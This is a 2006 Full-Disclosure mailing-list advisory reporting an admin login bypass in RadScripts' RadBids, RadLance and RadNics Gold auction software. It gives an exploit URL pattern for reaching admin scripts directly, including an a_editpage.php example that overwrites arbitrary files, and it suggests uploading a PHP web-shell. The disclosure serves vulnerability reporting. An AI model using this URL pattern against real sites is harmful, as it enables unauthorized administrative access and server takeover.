[Full-disclosure] RadBids Gold, RadLance Gold, RadNics Gold auction products: Admin bypass vulnerability

Duke Mon, 24 Jul 2006 00:05:41 -0700

Products: RadBids Gold, RadLance Gold, RadNics Gold auction products

Vendor: RadScripts

VULNERABILITY CLASS: Admin login bypass

[Product Description]

RadBids was designed to give you all the tools needed to rapidly deploy an ebay style auction web site solution. Our php

auction software is simple to deploy and easy to manage. From a web-based aministrative panel one can manage all aspects of

the auction software including categories, users, financial transactions and every aspect of the auction software with a few

clicks of the mouse.

[Summary]

An attacker can exploit RadScripts Auction Software admin login by entering the direct URL to admin scripts.

[Exploit]

http://target.xxx/[product_home]/admin/a_[admin_action_file]

For example:
http://target.xxx/[product_home]/admin/a_editpage.php?filename=[arbitrary_file]

This can be used overwrite any file on server which has write permissions on it.
For example upload own php web-shell.

[Credits]

INVENT

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] RadBids Gold, RadLance Gold, RadNics Gold auction products: Admin bypass vulnerability

Reply via email to